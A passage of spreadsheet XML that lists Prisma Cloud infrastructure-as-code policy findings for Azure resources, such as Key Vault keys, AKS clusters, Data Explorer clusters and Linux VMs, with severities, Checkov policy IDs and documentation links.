        </is>
      </c>
      <c r="AK889" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" t="inlineStr"/>
      <c r="B890" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C890" s="2" t="inlineStr"/>
      <c r="D890" t="inlineStr"/>
      <c r="E890" t="inlineStr"/>
      <c r="F890" t="inlineStr"/>
      <c r="G890" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J890" t="inlineStr">
        <is>
          <t>IaC:General:azure-key</t>
        </is>
      </c>
      <c r="K890" t="inlineStr">
        <is>
          <t>Key vault key is not backed by HSM</t>
        </is>
      </c>
      <c r="L890" t="inlineStr"/>
      <c r="M890" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N890" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O890" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P890" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q890" t="inlineStr"/>
      <c r="R890" t="inlineStr"/>
      <c r="S890" t="inlineStr"/>
      <c r="T890" t="b">
        <v>0</v>
      </c>
      <c r="U890" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V890" t="inlineStr">
        <is>
          <t>IaC:General:azure-key-vault-key</t>
        </is>
      </c>
      <c r="W890" t="inlineStr">
        <is>
          <t>Ensure that key vault key is backed by HSM</t>
        </is>
      </c>
      <c r="X890" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-key-is-backed-by-hsm</t>
        </is>
      </c>
      <c r="Y890" t="inlineStr"/>
      <c r="Z890" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_key_vault_key"]}</t>
        </is>
      </c>
      <c r="AA890" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB890" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC890" t="inlineStr">
        <is>
          <t>CKV_AZURE_112</t>
        </is>
      </c>
      <c r="AD890" t="b">
        <v>1</v>
      </c>
      <c r="AE890" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF890" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>13e037b0-68b4-4cac-aca6-4df4c9f98192</t>
        </is>
      </c>
      <c r="AI890" t="inlineStr"/>
      <c r="AJ890" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK890" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" t="inlineStr"/>
      <c r="B891" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C891" s="2" t="inlineStr"/>
      <c r="D891" t="inlineStr"/>
      <c r="E891" t="inlineStr"/>
      <c r="F891" t="inlineStr"/>
      <c r="G891" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J891" t="inlineStr">
        <is>
          <t>IaC:General:azure-key</t>
        </is>
      </c>
      <c r="K891" t="inlineStr">
        <is>
          <t>Azure Key Vault Keys does not have expiration date</t>
        </is>
      </c>
      <c r="L891" t="inlineStr"/>
      <c r="M891" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N891" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O891" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P891" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q891" t="inlineStr"/>
      <c r="R891" t="inlineStr"/>
      <c r="S891" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T891" t="b">
        <v>0</v>
      </c>
      <c r="U891" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V891" t="inlineStr">
        <is>
          <t>IaC:General:azure-key-vault-key</t>
        </is>
      </c>
      <c r="W891" t="inlineStr">
        <is>
          <t>Ensure that the expiration date is set on all keys</t>
        </is>
      </c>
      <c r="X891" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys</t>
        </is>
      </c>
      <c r="Y891" t="inlineStr"/>
      <c r="Z891" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_key_vault_key"]}</t>
        </is>
      </c>
      <c r="AA891" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB891" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC891" t="inlineStr">
        <is>
          <t>CKV_AZURE_40</t>
        </is>
      </c>
      <c r="AD891" t="b">
        <v>1</v>
      </c>
      <c r="AE891" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF891" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>13ce71fb-8b1a-46bc-8302-ec3cc67a49b5</t>
        </is>
      </c>
      <c r="AI891" t="inlineStr"/>
      <c r="AJ891" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK891" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" t="inlineStr"/>
      <c r="B892" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C892" s="2" t="inlineStr"/>
      <c r="D892" t="inlineStr"/>
      <c r="E892" t="inlineStr"/>
      <c r="F892" t="inlineStr"/>
      <c r="G892" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J892" t="inlineStr">
        <is>
          <t>IaC:General:azure-key</t>
        </is>
      </c>
      <c r="K892" t="inlineStr">
        <is>
          <t>Key vault secrets do not have content_type set</t>
        </is>
      </c>
      <c r="L892" t="inlineStr"/>
      <c r="M892" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N892" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O892" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P892" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q892" t="inlineStr"/>
      <c r="R892" t="inlineStr"/>
      <c r="S892" t="inlineStr"/>
      <c r="T892" t="b">
        <v>0</v>
      </c>
      <c r="U892" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V892" t="inlineStr">
        <is>
          <t>IaC:General:azure-key-vault-secret</t>
        </is>
      </c>
      <c r="W892" t="inlineStr">
        <is>
          <t>Ensure that key vault secrets have "content_type" set</t>
        </is>
      </c>
      <c r="X892" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-secrets-have-content-type-set</t>
        </is>
      </c>
      <c r="Y892" t="inlineStr"/>
      <c r="Z892" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_key_vault_secret"]}</t>
        </is>
      </c>
      <c r="AA892" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB892" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC892" t="inlineStr">
        <is>
          <t>CKV_AZURE_114</t>
        </is>
      </c>
      <c r="AD892" t="b">
        <v>1</v>
      </c>
      <c r="AE892" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF892" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>bf534684-b59a-4ce7-b012-430296bb7120</t>
        </is>
      </c>
      <c r="AI892" t="inlineStr"/>
      <c r="AJ892" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK892" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" t="inlineStr"/>
      <c r="B893" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C893" s="2" t="inlineStr"/>
      <c r="D893" t="inlineStr"/>
      <c r="E893" t="inlineStr"/>
      <c r="F893" t="inlineStr"/>
      <c r="G893" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J893" t="inlineStr">
        <is>
          <t>IaC:General:azure-kubernetes</t>
        </is>
      </c>
      <c r="K893" t="inlineStr">
        <is>
          <t>AKS Doesn't Use the Paid SKU for its SLA</t>
        </is>
      </c>
      <c r="L893" t="inlineStr"/>
      <c r="M893" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N893" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O893" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P893" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q893" t="inlineStr"/>
      <c r="R893" t="inlineStr"/>
      <c r="S893" t="inlineStr"/>
      <c r="T893" t="b">
        <v>0</v>
      </c>
      <c r="U893" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V893" t="inlineStr">
        <is>
          <t>IaC:General:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W893" t="inlineStr">
        <is>
          <t>Ensure that AKS use the Paid Sku for its SLA</t>
        </is>
      </c>
      <c r="X893" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-170</t>
        </is>
      </c>
      <c r="Y893" t="inlineStr"/>
      <c r="Z893" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA893" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB893" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC893" t="inlineStr">
        <is>
          <t>CKV_AZURE_170</t>
        </is>
      </c>
      <c r="AD893" t="b">
        <v>1</v>
      </c>
      <c r="AE893" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF893" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>8ecd7d4e-f9ef-40c4-b4fe-ec122b23f066</t>
        </is>
      </c>
      <c r="AI893" t="inlineStr"/>
      <c r="AJ893" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK893" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" t="inlineStr"/>
      <c r="B894" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C894" s="2" t="inlineStr"/>
      <c r="D894" t="inlineStr"/>
      <c r="E894" t="inlineStr"/>
      <c r="F894" t="inlineStr"/>
      <c r="G894" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J894" t="inlineStr">
        <is>
          <t>IaC:General:azure-kubernetes</t>
        </is>
      </c>
      <c r="K894" t="inlineStr">
        <is>
          <t>AKS Secrets Store Without Auto-Rotation</t>
        </is>
      </c>
      <c r="L894" t="inlineStr"/>
      <c r="M894" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N894" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O894" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P894" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q894" t="inlineStr"/>
      <c r="R894" t="inlineStr"/>
      <c r="S894" t="inlineStr"/>
      <c r="T894" t="b">
        <v>0</v>
      </c>
      <c r="U894" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V894" t="inlineStr">
        <is>
          <t>IaC:General:azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W894" t="inlineStr">
        <is>
          <t>Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters</t>
        </is>
      </c>
      <c r="X894" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-172</t>
        </is>
      </c>
      <c r="Y894" t="inlineStr"/>
      <c r="Z894" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA894" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB894" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC894" t="inlineStr">
        <is>
          <t>CKV_AZURE_172</t>
        </is>
      </c>
      <c r="AD894" t="b">
        <v>1</v>
      </c>
      <c r="AE894" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF894" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>823b1e28-89bd-4ab2-94de-7f134839fc9d</t>
        </is>
      </c>
      <c r="AI894" t="inlineStr"/>
      <c r="AJ894" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK894" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" t="inlineStr"/>
      <c r="B895" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C895" s="2" t="inlineStr"/>
      <c r="D895" t="inlineStr"/>
      <c r="E895" t="inlineStr"/>
      <c r="F895" t="inlineStr"/>
      <c r="G895" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J895" t="inlineStr">
        <is>
          <t>IaC:General:azure-kusto</t>
        </is>
      </c>
      <c r="K895" t="inlineStr">
        <is>
          <t>Azure Data Explorer encryption at rest does not use a customer-managed key</t>
        </is>
      </c>
      <c r="L895" t="inlineStr"/>
      <c r="M895" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N895" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O895" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P895" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q895" t="inlineStr"/>
      <c r="R895" t="inlineStr"/>
      <c r="S895" t="inlineStr"/>
      <c r="T895" t="b">
        <v>0</v>
      </c>
      <c r="U895" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V895" t="inlineStr">
        <is>
          <t>IaC:General:azure-kusto-cluster</t>
        </is>
      </c>
      <c r="W895" t="inlineStr">
        <is>
          <t>Ensure that Azure Data Explorer encryption at rest uses a customer-managed key</t>
        </is>
      </c>
      <c r="X895" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key</t>
        </is>
      </c>
      <c r="Y895" t="inlineStr"/>
      <c r="Z895" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_kusto_cluster"]}</t>
        </is>
      </c>
      <c r="AA895" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB895" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC895" t="inlineStr">
        <is>
          <t>CKV2_AZURE_11</t>
        </is>
      </c>
      <c r="AD895" t="b">
        <v>1</v>
      </c>
      <c r="AE895" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF895" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>f62f5111-f43b-442f-93fd-1b9b5625392d</t>
        </is>
      </c>
      <c r="AI895" t="inlineStr"/>
      <c r="AJ895" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK895" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" t="inlineStr"/>
      <c r="B896" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C896" s="2" t="inlineStr"/>
      <c r="D896" t="inlineStr"/>
      <c r="E896" t="inlineStr"/>
      <c r="F896" t="inlineStr"/>
      <c r="G896" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J896" t="inlineStr">
        <is>
          <t>IaC:General:azure-kusto</t>
        </is>
      </c>
      <c r="K896" t="inlineStr">
        <is>
          <t>Azure Data Explorer without SLA</t>
        </is>
      </c>
      <c r="L896" t="inlineStr"/>
      <c r="M896" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N896" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O896" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P896" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q896" t="inlineStr"/>
      <c r="R896" t="inlineStr"/>
      <c r="S896" t="inlineStr"/>
      <c r="T896" t="b">
        <v>0</v>
      </c>
      <c r="U896" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V896" t="inlineStr">
        <is>
          <t>IaC:General:azure-kusto-cluster</t>
        </is>
      </c>
      <c r="W896" t="inlineStr">
        <is>
          <t>Ensure that data explorer uses Sku with an SLA</t>
        </is>
      </c>
      <c r="X896" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-180</t>
        </is>
      </c>
      <c r="Y896" t="inlineStr"/>
      <c r="Z896" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_kusto_cluster"]}</t>
        </is>
      </c>
      <c r="AA896" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB896" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC896" t="inlineStr">
        <is>
          <t>CKV_AZURE_180</t>
        </is>
      </c>
      <c r="AD896" t="b">
        <v>1</v>
      </c>
      <c r="AE896" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF896" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>43516f40-5997-4e06-8c1f-c0c4966f9e7d</t>
        </is>
      </c>
      <c r="AI896" t="inlineStr"/>
      <c r="AJ896" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK896" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" t="inlineStr"/>
      <c r="B897" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C897" s="2" t="inlineStr"/>
      <c r="D897" t="inlineStr"/>
      <c r="E897" t="inlineStr"/>
      <c r="F897" t="inlineStr"/>
      <c r="G897" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J897" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K897" t="inlineStr">
        <is>
          <t>Linux VM Without SSH Key</t>
        </is>
      </c>
      <c r="L897" t="inlineStr"/>
      <c r="M897" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N897" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O897" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P897" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q897" t="inlineStr"/>
      <c r="R897" t="inlineStr"/>
      <c r="S897" t="inlineStr"/>
      <c r="T897" t="b">
        <v>0</v>
      </c>
      <c r="U897" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V897" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-virtual-machine,azure-linux-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W897" t="inlineStr">
        <is>
          <t>Ensure linux VM enables SSH with keys for secure communication</t>
        </is>
      </c>
      <c r="X897" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-178</t>
        </is>
      </c>
      <c r="Y897" t="inlineStr"/>
      <c r="Z897" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_virtual_machine","azurerm_linux_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA897" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB897" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC897" t="inlineStr">
        <is>
          <t>CKV_AZURE_178</t>
        </is>
      </c>
      <c r="AD897" t="b">
        <v>1</v>
      </c>
      <c r="AE897" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF897" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>ba522a86-be94-455d-8098-bf210b6e965f</t>
        </is>
      </c>
      <c r="AI897" t="inlineStr"/>
      <c r="AJ897" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK897" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" t="inlineStr"/>
      <c r="B898" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C898" s="2" t="inlineStr"/>
      <c r="D898" t="inlineStr"/>
      <c r="E898" t="inlineStr"/>
      <c r="F898" t="inlineStr"/>
      <c r="G898" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J898" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K898" t="inlineStr">
        <is>
          <t>Virtual Machine extensions are installed</t>
        </is>
      </c>
      <c r="L898" t="inlineStr"/>
      <c r="M898" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N898" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O898" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P898" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q898" t="inlineStr"/>
      <c r="R898" t="inlineStr"/>
      <c r="S898" t="inlineStr"/>
      <c r="T898" t="b">
        <v>0</v>
      </c>
      <c r="U898" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V898" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-virtual-machine,azure-virtual-machine</t>
        </is>
      </c>
      <c r="W898" t="inlineStr">
        <is>
          <t>Ensure Virtual Machine Extensions are not Installed</t>
        </is>
      </c>
      <c r="X898" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14</t>
        </is>
      </c>
      <c r="Y898" t="inlineStr"/>
      <c r="Z898" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_virtual_machine","azurerm_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA898" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB898" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC898" t="inlineStr">
        <is>
          <t>CKV_AZURE_50</t>
        </is>
      </c>
      <c r="AD898" t="b">
        <v>1</v>
      </c>
      <c r="AE898" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF898" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>17e75f8f-fc17-4981-9580-9e9fce0aeee9</t>
        </is>
      </c>
      <c r="AI898" t="inlineStr"/>
      <c r="AJ898" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK898" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" t="inlineStr"/>
      <c r="B899" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C899" s="2" t="inlineStr"/>
      <c r="D899" t="inlineStr"/>
      <c r="E899" t="inlineStr"/>
      <c r="F899" t="inlineStr"/>
      <c r="G899" t="b">
        <v>1</v>
      </c>
      <c r="H8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899" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J899" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K899" t="inlineStr">
        <is>
          <t>Azure Linux and Windows Virtual Machines does not utilize Managed Disks</t>
        </is>
      </c>
      <c r="L899" t="inlineStr"/>
      <c r="M899" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N899" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O899" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P899" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q899" t="inlineStr"/>
      <c r="R899" t="inlineStr"/>
      <c r="S899" t="inlineStr"/>
      <c r="T899" t="b">
        <v>0</v>
      </c>
      <c r="U899" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V899" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-virtual-machine,azure-windows-virtual-machine</t>
        </is>
      </c>
      <c r="W899" t="inlineStr">
        <is>
          <t>Ensure that Virtual Machines use managed disks</t>
        </is>
      </c>
      <c r="X899" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks</t>
        </is>
      </c>
      <c r="Y899" t="inlineStr"/>
      <c r="Z899" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_virtual_machine","azurerm_windows_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA899" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB899" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC899" t="inlineStr">
        <is>
          <t>CKV_AZURE_92</t>
        </is>
      </c>
      <c r="AD899" t="b">
        <v>1</v>
      </c>
      <c r="AE899" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF899" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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899" t="inlineStr">
        <is>
          <t>2ada7204-3fa1-4d82-b6af-85322c58bbed</t>
        </is>
      </c>
      <c r="AI899" t="inlineStr"/>
      <c r="AJ899" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK899" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" t="inlineStr"/>
      <c r="B900" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C900" s="2" t="inlineStr"/>
      <c r="D900" t="inlineStr"/>
      <c r="E900" t="inlineStr"/>
      <c r="F900" t="inlineStr"/>
      <c r="G900" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J900" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K900" t="inlineStr">
        <is>
          <t>Azure Linux scale set does not use an SSH key</t>
        </is>
      </c>
      <c r="L900" t="inlineStr"/>
